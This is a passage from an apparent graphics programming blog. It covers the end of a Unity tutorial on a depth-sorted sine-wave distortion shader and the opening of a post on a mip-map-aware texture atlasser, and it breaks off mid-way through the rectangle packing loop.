<span class="n">maskCam</span><span class="p">.</span><span class="nf">SetTargetBuffers</span><span class="p">(</span><span class="n">distortingRT</span><span class="p">.</span><span class="n">colorBuffer</span><span class="p">,</span> <span class="n">distortingRT</span><span class="p">.</span><span class="n">depthBuffer</span><span class="p">);</span>
<span class="n">maskCam</span><span class="p">.</span><span class="nf">Render</span><span class="p">();</span>
<span class="p">}</span></code></pre></figure>
<p>If you aren’t on a platform that gives you access to floating point textures, you can actually use a RenderTextureFormat.Default here, but since you’ll have so little precision in your alpha channel, distorting objects won’t sort correctly as they get farther away from the camera. For relatively small scenes (like a single room) this likely won’t be noticeable, but you’ll start to see more artifacts as your environment gets larger.</p>
<p>If you take a peek at your distortingRT in the inspector, you should see your distorting objects being rendered on top of a copy of what the main camera sees. In the image below, the robots are actually located behind the other geometry in world space, but they are rendered in front of it for the purposes of the distortion buffer.</p>
<div align="center">
<img src="/images/post_images/2017-02-05/withdistort.PNG" /><br />
</div>
<p>This is expected and important. If we let our distorting objects sort now, then when an object is partly occluded, we won’t have all the colour information we need to distort the object behind the occluder, leading to artifacts along the edges of occluding objects. So to address this, we’re going to let our objects render on top of everything now, and manually do the depth sorting later. It’s fun! And speaking of rendering our distorting objects, I think now is as good a time as any to talk about what needs to be in the shaders that the distorting object use.</p>
<h3>The Distorting Object Shader</h3>
<p>For the most part, this effect can work with any shader you want, provided you can make a small modification to the alpha output. For opaque shaders this is likely not an issue, since they don’t use the alpha channel for anything. Since transparent shaders use their alpha for blending, they’ll need a second pass to write the alpha.</p>
<p>As mentioned earlier, we’re going to use the alpha channel of distortingRT as a depth buffer, so that we can access them in our composite shader to do the depth sorting I was just talking about, so we need our distorting materials to output their depth into the alpha channel. Again, this isn’t a terribly complicated thing to do, but we need to be aware of platform specific differences in handling depth and clip space.</p>
<p>First though, we need to get the data we need from our vertex shader to the fragment. This isn’t too difficult, since all we need are the z and w components of your transformed position vector (assuming you’re transforming it by the MVP, like so):</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">o</span><span class="p">.</span><span class="n">pos</span> <span class="p">=</span> <span class="nf">mul</span><span class="p">(</span><span class="n">UNITY_MATRIX_MVP</span><span class="p">,</span> <span class="n">v</span><span class="p">.</span><span class="n">vertex</span><span class="p">);</span></code></pre></figure>
<p>The Z component of this vector is what I think about when I think of depth, it represents the distance from the camera. Unfortunately this value can be well outside the 0 to 1 range that we need to be able to encode it into an alpha channel. To fix that, we can divide by the W component of the position vector, which will get us depth represented in relation to the view frustum. In DirectX, this is going to get us a value of between 0 and 1, with 1 being the far clip, and 0 being the near clip. In OpenGL, which uses a different sort of projection matrix, we’re going to end up with a value of between -1 and 1. So we need to do some quick math to make sure we don’t try to put a negative value into our texture:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">float4</span> <span class="nf">frag</span> <span class="p">(</span><span class="n">v2f</span> <span class="n">i</span><span class="p">)</span> <span class="p">:</span> <span class="n">SV_Target</span>
<span class="p">{</span>
<span class="c1">//other shading logic fills RGB channels</span>
<span class="n">col</span><span class="p">.</span><span class="n">a</span> <span class="p">=</span> <span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">screen</span><span class="p">.</span><span class="n">z</span> <span class="p">/</span> <span class="n">i</span><span class="p">.</span><span class="n">screen</span><span class="p">.</span><span class="n">w</span><span class="p">);</span>
<span class="c1">//using UNITY_REVERSED_Z becuase SHADER_TARGET_GLSL</span>
<span class="c1">//doesn't seem to work on my machine</span>
<span class="cp">#if !defined(UNITY_REVERSED_Z)
</span> <span class="n">col</span><span class="p">.</span><span class="n">a</span> <span class="p">=</span> <span class="p">(</span><span class="n">col</span><span class="p">.</span><span class="n">a</span> <span class="p">+</span> <span class="m">1.0</span><span class="p">)</span> <span class="p">*</span> <span class="m">0.5</span><span class="p">;</span>
<span class="cp">#endif
</span> <span class="k">return</span> <span class="n">col</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>With that modification to your shaders, if you render only the alpha channel of your distortingRT, it should look something like this:</p>
<div align="center">
<img src="/images/post_images/2017-02-05/distortdepth.PNG" /><br />
</div>
<h3>The Composite Shader</h3>
<p>Now all that’s left is to put this all together. The composite shader is going to be the most complicated shader we’ve talked about so far, so I’m going to provide more of the code than I have been. To start with, let’s look at the data we are going to pass the shader:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">sampler2D</span> <span class="n">_MainTex</span><span class="p">;</span>
<span class="n">float4</span> <span class="n">_MainTex_ST</span><span class="p">;</span>
<span class="n">sampler2D</span> <span class="n">_DistortionRT</span><span class="p">;</span>
<span class="n">sampler2D</span> <span class="n">_CameraDepthTexture</span><span class="p">;</span>
<span class="kt">float</span> <span class="n">_DistortionOffset</span><span class="p">;</span>
<span class="kt">float</span> <span class="n">_DistortionAmount</span><span class="p">;</span></code></pre></figure>
<p>_MainTex is going to be the regular old colour buffer that the main camera sees, nothing special there. _DistortionRT is the buffer that we’ve been building up until now, with the RGB of our distorting objects, and their depths stored in the alpha channel.</p>
<p>_CameraDepthTexture is going to be the depth texture created by the main camera. This is a globally accessible resource that Unity will make for us, since we specified a depth texture mode for the main camera at the beginning of this post.</p>
<p>Finally, the two floating point values are to control the distortion effect. _DistortionOffset controls how fast the distortion effect moves, and as we saw earlier, is passed in as Time.time multiplied by a constant. The higher we set the constant value, the faster the distortion wiggles. _DistortionAmount is also passed in from our effect script, and controls how wide we want the distortion effect to be. Changing this value determines whether we have a subtle wobble or a spastic glitch effect.</p>
<div align="center">
<img src="/images/post_images/2017-02-05/distortingmagnitude.gif" /><br />
</div>
<p>Got it? good! I’m going to skip talking about the vertex shader because it’s just a passthrough:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">v2f</span> <span class="nf">vert</span><span class="p">(</span><span class="n">appdata</span> <span class="n">v</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">v2f</span> <span class="n">o</span><span class="p">;</span>
<span class="n">o</span><span class="p">.</span><span class="n">vertex</span> <span class="p">=</span> <span class="nf">mul</span><span class="p">(</span><span class="n">UNITY_MATRIX_MVP</span><span class="p">,</span> <span class="n">v</span><span class="p">.</span><span class="n">vertex</span><span class="p">);</span>
<span class="n">o</span><span class="p">.</span><span class="n">uv</span> <span class="p">=</span> <span class="nf">TRANSFORM_TEX</span><span class="p">(</span><span class="n">v</span><span class="p">.</span><span class="n">uv</span><span class="p">,</span><span class="n">_MainTex</span><span class="p">);</span>
<span class="k">return</span> <span class="n">o</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>So let’s jump directly to the good part, the fragment shader. First let’s get the values we need from the _MainTex and the _CameraDepthTexture:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">fixed4</span> <span class="nf">frag</span><span class="p">(</span><span class="n">v2f</span> <span class="n">i</span><span class="p">)</span> <span class="p">:</span> <span class="n">SV_Target</span>
<span class="p">{</span>
<span class="n">fixed4</span> <span class="n">screen</span> <span class="p">=</span> <span class="nf">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="nf">float2</span><span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">.</span><span class="n">x</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">.</span><span class="n">y</span><span class="p">));</span>
<span class="n">float2</span> <span class="n">distortUVs</span> <span class="p">=</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">;</span>
<span class="cp">#if defined(UNITY_UV_STARTS_AT_TOP) && !defined(SHADER_API_MOBILE)
</span> <span class="n">distortUVs</span><span class="p">.</span><span class="n">y</span> <span class="p">=</span> <span class="m">1.0</span> <span class="p">-</span> <span class="n">distortUVs</span><span class="p">.</span><span class="n">y</span><span class="p">;</span>
<span class="cp">#endif
</span>
<span class="kt">float</span> <span class="n">d</span> <span class="p">=</span> <span class="nf">tex2D</span><span class="p">(</span><span class="n">_CameraDepthTexture</span><span class="p">,</span> <span class="n">distortUVs</span><span class="p">).</span><span class="n">r</span><span class="p">;</span></code></pre></figure>
<p>I wish I had a better explanation for the #ifdef section, but I don’t. Sometimes Unity accounts for the UV flip between platforms and sometimes it doesn’t. As far as I could tell, _MainTex is always right side up, and this set of defines will get us the correctly oriented UVs on whatever platform we’re using (I tested with GL, D3D11 and on an iPhone using Metal).</p>
<p>Other than that bit of engine specific weirdness, this should be pretty easy to follow so far. So let’s make it more complicated and grab our _distortionRT value.</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">float4</span> <span class="n">distort</span> <span class="p">=</span> <span class="nf">tex2D</span><span class="p">(</span><span class="n">_DistortionRT</span><span class="p">,</span> <span class="nf">fixed2</span><span class="p">(</span><span class="n">distortUVs</span><span class="p">.</span><span class="n">x</span> <span class="p">+</span> <span class="nf">sin</span><span class="p">((</span><span class="n">distortUVs</span><span class="p">.</span><span class="n">y</span> <span class="p">+</span> <span class="n">_DistortionOffset</span><span class="p">)</span> <span class="p">*</span> <span class="m">100</span><span class="p">)*</span><span class="n">_DistortionAmount</span><span class="p">,</span> <span class="n">distortUVs</span><span class="p">.</span><span class="n">y</span><span class="p">));</span></code></pre></figure>
<p>This is likely confusing. All the crazy UV math is because we want to apply the distortion effect here. So we use this math to grab the colour at the position that the distortion effect needs us to read from. I went over this in much more detail in my <a href="http://kylehalladay.com/blog/tutorial/2016/01/15/Screen-Space-Distortion.html">previous post</a> so I’m not going to talk much more about this here. For today’s purposes, here’s what you need to keep in mind:</p>
<ul>
<li>
<p>Using this UV math will distort the entire _DistortingRT buffer, so if we just returned this color, the entire screen would be distorted.</p>
</li>
<li>
<p>The alpha channel still contains depth</p>
</li>
</ul>
<p>Now that we have these values, we need to finally depth sort our distorting objects. Luckily, we now have 2 depth values, so all we need to do is compare them. In cases where the depth from _DistortingRT is closer to the camera, we want to return the RGB from _DistortingRT, and otherwise, we want to return the regular old _MainTex. Pretty easy right?</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="cp">#if UNITY_REVERSED_Z
</span> <span class="k">return</span> <span class="nf">lerp</span><span class="p">(</span><span class="n">screen</span><span class="p">,</span> <span class="n">distort</span><span class="p">,</span> <span class="n">distort</span><span class="p">.</span><span class="n">a</span> <span class="p">></span> <span class="n">d</span><span class="p">);</span>
<span class="cp">#else
</span> <span class="k">return</span> <span class="nf">lerp</span><span class="p">(</span><span class="n">screen</span><span class="p">,</span> <span class="n">distort</span><span class="p">,</span> <span class="n">distort</span><span class="p">.</span><span class="n">a</span> <span class="p"><</span> <span class="n">d</span><span class="p">);</span>
<span class="err">#</span><span class="n">endif</span></code></pre></figure>
<p>Remember that different platforms handle depth differently, so depending on which platform you’re on, your comparison will need to flip, as shown above.</p>
<p>The entire source for the composite fragment function is as follows:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">fixed4</span> <span class="nf">frag</span><span class="p">(</span><span class="n">v2f</span> <span class="n">i</span><span class="p">)</span> <span class="p">:</span> <span class="n">SV_Target</span>
<span class="p">{</span>
<span class="n">fixed4</span> <span class="n">screen</span> <span class="p">=</span> <span class="nf">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="nf">float2</span><span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">.</span><span class="n">x</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">.</span><span class="n">y</span><span class="p">));</span>
<span class="n">float2</span> <span class="n">distortUVs</span> <span class="p">=</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">;</span>
<span class="cp">#if defined(UNITY_UV_STARTS_AT_TOP) && !defined(SHADER_API_MOBILE)
</span> <span class="n">distortUVs</span><span class="p">.</span><span class="n">y</span> <span class="p">=</span> <span class="m">1.0</span> <span class="p">-</span> <span class="n">distortUVs</span><span class="p">.</span><span class="n">y</span><span class="p">;</span>
<span class="cp">#endif
</span>
<span class="n">float4</span> <span class="n">distort</span> <span class="p">=</span> <span class="nf">tex2D</span><span class="p">(</span><span class="n">_DistortionRT</span><span class="p">,</span> <span class="nf">fixed2</span><span class="p">(</span><span class="n">distortUVs</span><span class="p">.</span><span class="n">x</span> <span class="p">+</span> <span class="nf">sin</span><span class="p">((</span><span class="n">distortUVs</span><span class="p">.</span><span class="n">y</span> <span class="p">+</span> <span class="n">_DistortionOffset</span><span class="p">)</span> <span class="p">*</span> <span class="m">100</span><span class="p">)*</span><span class="n">_DistortionAmount</span><span class="p">,</span> <span class="n">distortUVs</span><span class="p">.</span><span class="n">y</span><span class="p">));</span>
<span class="kt">float</span> <span class="n">d</span> <span class="p">=</span> <span class="nf">tex2D</span><span class="p">(</span><span class="n">_CameraDepthTexture</span><span class="p">,</span> <span class="n">distortUVs</span><span class="p">).</span><span class="n">r</span><span class="p">;</span>
<span class="cp">#if UNITY_REVERSED_Z
</span> <span class="k">return</span> <span class="nf">lerp</span><span class="p">(</span><span class="n">screen</span><span class="p">,</span> <span class="n">distort</span><span class="p">,</span> <span class="n">distort</span><span class="p">.</span><span class="n">a</span> <span class="p">></span> <span class="n">d</span><span class="p">);</span>
<span class="cp">#else
</span> <span class="k">return</span> <span class="nf">lerp</span><span class="p">(</span><span class="n">screen</span><span class="p">,</span> <span class="n">distort</span><span class="p">,</span> <span class="n">distort</span><span class="p">.</span><span class="n">a</span> <span class="p"><</span> <span class="n">d</span><span class="p">);</span>
<span class="cp">#endif
</span><span class="p">}</span></code></pre></figure>
<p>All we need to do now is add the final blit to the effect script, which makes the completed OnRenderImage function look like so:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="k">private</span> <span class="k">void</span> <span class="nf">OnRenderImage</span><span class="p">(</span><span class="n">RenderTexture</span> <span class="n">src</span><span class="p">,</span> <span class="n">RenderTexture</span> <span class="n">dst</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">RenderTexture</span> <span class="n">distortingRT</span> <span class="p">=</span> <span class="n">RenderTexture</span><span class="p">.</span><span class="nf">GetTemporary</span><span class="p">(</span><span class="n">scaledWidth</span><span class="p">,</span> <span class="n">scaledHeight</span><span class="p">,</span> <span class="m">24</span><span class="p">,</span> <span class="n">RenderTextureFormat</span><span class="p">.</span><span class="n">ARGBFloat</span><span class="p">);</span>
<span class="n">Graphics</span><span class="p">.</span><span class="nf">Blit</span><span class="p">(</span><span class="n">src</span><span class="p">,</span> <span class="n">distortingRT</span><span class="p">,</span> <span class="n">stripAlphaMat</span><span class="p">);</span>
<span class="n">maskCam</span><span class="p">.</span><span class="nf">CopyFrom</span><span class="p">(</span><span class="n">cam</span><span class="p">);</span>
<span class="n">maskCam</span><span class="p">.</span><span class="n">gameObject</span><span class="p">.</span><span class="n">transform</span><span class="p">.</span><span class="n">position</span> <span class="p">=</span> <span class="n">transform</span><span class="p">.</span><span class="n">position</span><span class="p">;</span>
<span class="n">maskCam</span><span class="p">.</span><span class="n">gameObject</span><span class="p">.</span><span class="n">transform</span><span class="p">.</span><span class="n">rotation</span> <span class="p">=</span> <span class="n">transform</span><span class="p">.</span><span class="n">rotation</span><span class="p">;</span>
<span class="c1">//draw the distorting objects into the buffer</span>
<span class="n">maskCam</span><span class="p">.</span><span class="n">clearFlags</span> <span class="p">=</span> <span class="n">CameraClearFlags</span><span class="p">.</span><span class="n">Depth</span><span class="p">;</span>
<span class="n">maskCam</span><span class="p">.</span><span class="n">cullingMask</span> <span class="p">=</span> <span class="m">1</span> <span class="p"><<</span> <span class="n">LayerMask</span><span class="p">.</span><span class="nf">NameToLayer</span><span class="p">(</span><span class="s">"Distortion"</span><span class="p">);</span>
<span class="n">maskCam</span><span class="p">.</span><span class="nf">SetTargetBuffers</span><span class="p">(</span><span class="n">distortingRT</span><span class="p">.</span><span class="n">colorBuffer</span><span class="p">,</span> <span class="n">distortingRT</span><span class="p">.</span><span class="n">depthBuffer</span><span class="p">);</span>
<span class="n">maskCam</span><span class="p">.</span><span class="nf">Render</span><span class="p">();</span>
<span class="c1">//Composite pass</span>
<span class="n">compositeMat</span><span class="p">.</span><span class="nf">SetTexture</span><span class="p">(</span><span class="s">"_DistortionRT"</span><span class="p">,</span> <span class="n">distortingRT</span><span class="p">);</span>
<span class="n">Graphics</span><span class="p">.</span><span class="nf">Blit</span><span class="p">(</span><span class="n">src</span><span class="p">,</span> <span class="n">dst</span><span class="p">,</span> <span class="n">compositeMat</span><span class="p">);</span>
<span class="n">RenderTexture</span><span class="p">.</span><span class="nf">ReleaseTemporary</span><span class="p">(</span><span class="n">distortingRT</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<h3>Performance Thoughts, Other Considerations</h3>
<p>So now we should have a working effect! If you’re lost with implementing any part of this, or were just too lazy to do it yourself, all the code for the effect is available on github <a href="https://github.com/khalladay/SinewaveShapeDistortion">here</a>.</p>
<p>All that’s left to do is talk about some left over details that didn’t fit anywhere else, and performance. Luckily the performance talk is short - this is a pretty lightweight effect. With a scale factor of 0.5 (so the distortion buffer is half the resolution of the main camera’s), my iPhone eats this for breakfast. This will of course become more expensive the bigger your distortion buffer is, but on such a small screen you can probably get away with a half res buffer.</p>
<p>And if my phone can run this… I think it goes without saying that both my laptops barely noticed this effect. I don’t have numbers because everything ran this at 60 fps and I really didn’t care to spend my weekend trying to get any more granular than that.</p>
<p>The other thing to mention is what could be done to make this effect better! The sine wave distortion is fairly cheesy, but you could likely extend this to handle more interesting distortion patterns if you took a few concepts from my <a href="http://kylehalladay.com/blog/tutorial/2016/01/15/Screen-Space-Distortion.html">other post on screen space distortion</a>.</p>
<p>Also, since this is all in screen space, objects that are farther away from the camera appear to be distorting at a higher magnitude than objects closer to your camera. You could probably account for this by scaling the distortion magnitude based on the distorting object’s depth, but I haven’t tried this out yet.</p>
<p>That’s all for now, shoot me a message <a href="https://twitter.com/khalladay">on Twitter</a> if you have any questions or are doing something with this effect :)</p>
Minimizing Mip Map Artifacts In Atlassed Textures2016-11-04T00:00:00+00:00http://kylehalladay.com/blog/tutorial/2016/11/04/Texture-Atlassing-With-Mips<p>Since all my professional work is on mobile games, I spend a LOT of time working on tools and systems that can squeeze as much performance out of low powered hardware as possible. Perhaps unsurprisingly, one of these tools is texture atlassing, that is, packing multiple textures into a larger image, which ends up looking something like this:</p>
<div align="center">
<img src="/images/post_images/2016-10-11/exampleatlas.png" />
<br />
<br />
</div>
<p>That Texture Atlassing is a good idea isn’t really news. I’m not here to sell you on the benefits of doing it (although if I was, I’d mention things like fewer texture state changes, improved batching, lower memory usage, and the ability to use NPOT textures on ES2 hardware), what I am here to do is to walk through how to build a good one.</p>
<p>There are a lot of tutotials and texture atlassing options out there already, but they all seem targetted at people making 2D games or using them for UI. While these are perfectly good use cases, they often ignore one of the harder problems when you’re working with Texture Atlasses: mip mapping. If you’ve ever atlassed a 3D scene (which is a very VERY good idea on mobile), you’ve probably noticed some ugly texture seams when your camera pulls back:</p>
<div align="center">
<img src="/images/post_images/2016-10-11/badmips.png" />
<font size="1">(I didn't use the atlas in the first picture to make this one)</font><br />
<br />
</div>
<p>This is what it looks like when your texture atlasser isn’t build to handle mip mapping. Notice how in the distance, there starts to be weird colours (from an adjacent sprite in my atlas) polluting the appearance of our texture. Again, not applicable to UI or 2D things, but very applicable to what I do (3D), so today I thought I’d go over how write a texture atlasser that does solve these problems.</p>
<h2 id="brief-aside-what-is-mip-mapping">Brief Aside: What is Mip Mapping</h2>
<p>Mip Mapping is a rendering technique which creates lower resolution versions of a texture, and swaps to these lower resolution textures based on how far away an object is from the camera. This is done both to increase rendering speed, and to improve rendering quality. Without mip mapping, as textures get farther away, then tend to start “shimmering”, which looks really unnatural, with mip mapping the renderer switches to a lower resolution (and essentially pre antialiased) version of the texture, which eliminates this shimmer:
<br /></p>
<div align="center">
<img align="left" src="/images/post_images/2016-10-11/nomipsshort.gif" /><img align="right" src="/images/post_images/2016-10-11/mipsshort.gif" />
<br />
<br />
<br /><br />
<br />
<br /><br />
<br />
<br /><br />
</div>
<p><br /></p>
<p>If you’re using Unity, you’ve almost certainly been using mip maps the whole time without knowing it (although you may have wondered why the size of your images in memory was larger than you thought), and in most cases you never have to think about mip mapping at all. With texture atlassing, you do, and this is because mip maps are usually generated by taking the original image, and shrinking it by halving both dimensions of the texture. This is done multiple times, so a 512x512 texture will have mips with a width and height of 256,128,64,32,etc. This shrinking is done most often using a simple Bilinear Filter, which essentially averages a bunch of pixels in the high resolution image to determine what colour a pixel is in a lower resolution version</p>
<p>In most cases, this is great, but in a texture atlas, this can lead to the edges of individual textures getting mixed with neighboring textures when the mips are generated. In extreme cases (like pictured above), the edges of a really bright texture can pick up dark colours and look very different from what’s intended. There are lots of ways to mitigate this in a texture atlasser, but I’ve yet to find a texture atlasser out there that does any of them by default, so today we’re going to build one that does.</p>
<h2 id="how-a-texture-atlasser-works">How A Texture Atlasser Works</h2>
<p>At a high level, a texture atlasser consists of two parts, which I’ve assigned super unofficial names:</p>
<ul>
<li>A Texture Packer, which determines where to put each texture in the atlas</li>
<li>A Blitter, which uses the UV rectangles generated by the bin packer to draw textures into the output atlas texture.</li>
</ul>
<p>The Texture Packer is a pretty universal component. We’re going to walk through building one for completeness sake, but the real meat here is what we do in the Blitter to help our mip maps.</p>
<h2 id="how-to-build-a-texture-packer">How to Build a Texture Packer</h2>
<p>Since it’s the first step in the process, let’s tackle the packer first. I’m going to write all the code in Unity because then I can piggy back on all their systems and keep the amount of code in this article manageable, but the core concepts are applicable anywhere. It’s worth noting that there isn’t really anything special about this texture packing implementation, we’ll get to the real meat of what I want to talk about in the Blitter section.</p>
<h3 id="the-output-struct">The Output Struct</h3>
<p>Speaking of core concepts, let’s talk about what our Texture Packer is going to output.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">public</span> <span class="k">struct</span> <span class="nc">AtlasLayout</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="n">width</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">height</span><span class="p">;</span>
<span class="k">public</span> <span class="n">List</span><span class="o"><</span><span class="n">Texture2D</span><span class="o">></span> <span class="n">textures</span><span class="p">;</span>
<span class="k">public</span> <span class="n">List</span><span class="o"><</span><span class="n">Rect</span><span class="o">></span> <span class="n">rects</span><span class="p">;</span>
<span class="k">public</span> <span class="n">AtlasLayout</span><span class="p">(</span><span class="kt">int</span> <span class="n">w</span><span class="p">,</span> <span class="kt">int</span> <span class="n">h</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">width</span> <span class="o">=</span> <span class="n">w</span><span class="p">;</span>
<span class="n">height</span> <span class="o">=</span> <span class="n">h</span><span class="p">;</span>
<span class="n">textures</span> <span class="o">=</span> <span class="k">new</span> <span class="n">List</span><span class="o"><</span><span class="n">Texture2D</span><span class="o">></span><span class="p">();</span>
<span class="n">rects</span> <span class="o">=</span> <span class="k">new</span> <span class="n">List</span><span class="o"><</span><span class="n">Rect</span><span class="o">></span><span class="p">();</span>
<span class="p">}</span>
<span class="p">};</span></code></pre></figure>
<p>The reason we need to output all this data is to handle cases where we want to return list of AtlasLayouts instead of a single one, which we might want to do if we have a lot of textures to atlas, but our hardware limits us to a max of 2048x2048 textures (like some mobile phones). In the interest of brevity, I’m not going to handle multiple atlasses in this article, but I still feel like having a defined output struct makes things cleaner.</p>
<p>So now we have our output set up, let’s start fitting rectangles into other rectangles, shall we? There are lots of algorithms for doing this (many are described in detail <a href="http://clb.demon.fi/projects/more-rectangle-bin-packing">here</a>, but the one I like best is the MaxRect algorithm.</p>
<h3 id="the-packtextures-function">The PackTextures Function</h3>
<p>The algorithm works by defining a list of “Free Rectangles”, that is, a list of empty rectangles in the target atlas texture. Before the first texture is packed, our list of Free rectangles will contain a single element which has position (0,0), and be the size of the atlas. I’m going to start putting this initial setup into our PackTexture function, which will be the publically exposed function we call when we want to kick off the TexturePacker.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">public</span> <span class="k">static</span> <span class="n">AtlasLayout</span> <span class="nf">PackTextures</span><span class="p">(</span><span class="n">Texture2D</span><span class="p">[]</span> <span class="n">textures</span><span class="p">,</span> <span class="kt">int</span> <span class="n">maxWidth</span><span class="p">,</span> <span class="kt">int</span> <span class="n">maxHeight</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">AtlasLayout</span> <span class="n">results</span> <span class="o">=</span> <span class="k">new</span> <span class="n">AtlasLayout</span><span class="p">(</span><span class="n">maxWidth</span><span class="p">,</span> <span class="n">maxHeight</span><span class="p">);</span>
<span class="n">List</span><span class="o"><</span><span class="n">Rect</span><span class="o">></span> <span class="n">freeRects</span> <span class="o">=</span> <span class="k">new</span> <span class="n">List</span><span class="o"><</span><span class="n">Rect</span><span class="o">></span><span class="p">();</span>
<span class="n">List</span><span class="o"><</span><span class="n">Texture2D</span><span class="o">></span> <span class="n">textureToPlace</span> <span class="o">=</span> <span class="k">new</span> <span class="n">List</span><span class="o"><</span><span class="n">Texture2D</span><span class="o">></span><span class="p">(</span><span class="n">textures</span><span class="p">);</span>
<span class="n">texturesToPlace</span> <span class="o">=</span> <span class="n">texturesToPlace</span><span class="p">.</span><span class="n">OrderBy</span><span class="p">(</span> <span class="n">x</span> <span class="o">=></span> <span class="n">x</span><span class="p">.</span><span class="n">width</span> <span class="o">*</span> <span class="n">x</span><span class="p">.</span><span class="n">height</span><span class="p">).</span><span class="n">ToList</span><span class="p">();</span>
<span class="n">freeRects</span><span class="p">.</span><span class="n">Add</span><span class="p">(</span><span class="k">new</span> <span class="n">Rect</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="n">maxWidth</span><span class="p">,</span> <span class="n">maxHeight</span><span class="p">));</span>
<span class="p">...</span></code></pre></figure>
<p>You’ll notice that I’m also sorting our input textures. This is to make sure that we try to place the larger textures first, since they’re the hardest ones to find space for in an atlas. Linq is awful for runtime performance, but for a build-time tool like our atlasser, it makes our lives a lot easier (and my blog post a lot shorter).</p>
<p>Now we need to start placing atlasses into the area defined by our free list. To figure out where to place a texture, we’re going to call our FindIdealRect function. This function is going to return two score values to us, along with the candidate rectangle that it finds.</p>
<p>We’re going to call FindIdealRect on every texture that we have to place, and only actually Insert the rectangle which has the best score. Then we’ll remove that texture from the list and do the whole process again.</p>
<p>This looks like this:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="p">...</span>
<span class="k">while</span> <span class="p">(</span><span class="n">texturesToPlace</span><span class="p">.</span><span class="n">Count</span> <span class="o">></span> <span class="mi">0</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="n">bestShortSideScore</span> <span class="o">=</span> <span class="kt">int</span><span class="p">.</span><span class="n">MaxValue</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">bestLongSideScore</span> <span class="o">=</span> <span class="kt">int</span><span class="p">.</span><span class="n">MaxValue</span><span class="p">;</span>
<span class="n">Texture2D</span> <span class="n">bestTex</span> <span class="o">=</span> <span class="n">texturesToPlace</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
<span class="n">Rect</span> <span class="n">bestRect</span> <span class="o">=</span> <span class="k">new</span> <span class="n">Rect</span><span class="p">();</span>
<span class="n">foreach</span><span class="p">(</span><span class="n">Texture2D</span> <span class="n">curTex</span> <span class="n">in</span> <span class="n">texturesToPlace</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="n">shortSideScore</span> <span class="o">=</span> <span class="kt">int</span><span class="p">.</span><span class="n">MaxValue</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">longSideScore</span> <span class="o">=</span> <span class="kt">int</span><span class="p">.</span><span class="n">MaxValue</span><span class="p">;</span>
<span class="n">Rect</span> <span class="n">target</span> <span class="o">=</span> <span class="n">FindIdealRect</span><span class="p">(</span><span class="n">curTex</span><span class="p">.</span><span class="n">width</span><span class="p">,</span>
<span class="n">curTex</span><span class="p">.</span><span class="n">height</span><span class="p">,</span>
<span class="n">freeRects</span><span class="p">,</span>
<span class="n">ref</span> <span class="n">shortSideScore</span><span class="p">,</span>
<span class="n">ref</span> <span class="n">longSideScore</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">shortSideScore</span> <span class="o"><</span> <span class="n">bestShortSideScore</span>
<span class="o">||</span> <span class="p">(</span><span class="n">shortSideScore</span> <span class="o">==</span> <span class="n">bestShortSideScore</span> <span class="o">&&</span> <span class="n">longSideScore</span> <span class="o"><</span> <span class="n">bestLongSideScore</span><span class="p">))</span>
<span class="p">{</span>
<span class="n">bestShortSideScore</span> <span class="o">=</span> <span class="n">shortSideScore</span><span class="p">;</span>
<span class="n">bestLongSideScore</span> <span class="o">=</span> <span class="n">longSideScore</span><span class="p">;</span>
<span class="n">bestTex</span> <span class="o">=</span> <span class="n">curTex</span><span class="p">;</span>
<span class="n">bestRect</span> <span class="o">=</span> <span class="n">target</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">bestRect</span><span class="p">.</span><span class="n">width</span> <span class="o">></span> <span class="mi">0</span> <span class="o">&&</span> <span class="n">bestRect</span><span class="p">.</span><span class="n">height</span> <span class="o">></span> <span class="mi">0</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">RemoveRectFromFreeList</span><span class="p">(</span><span class="n">bestRect</span><span class="p">,</span> <span class="n">freeRects</span><span class="p">);</span>
<span class="n">results</span><span class="p">.</span><span class="n">textures</span><span class="p">.</span><span class="n">Add</span><span class="p">(</span><span class="n">bestTex</span><span class="p">);</span>
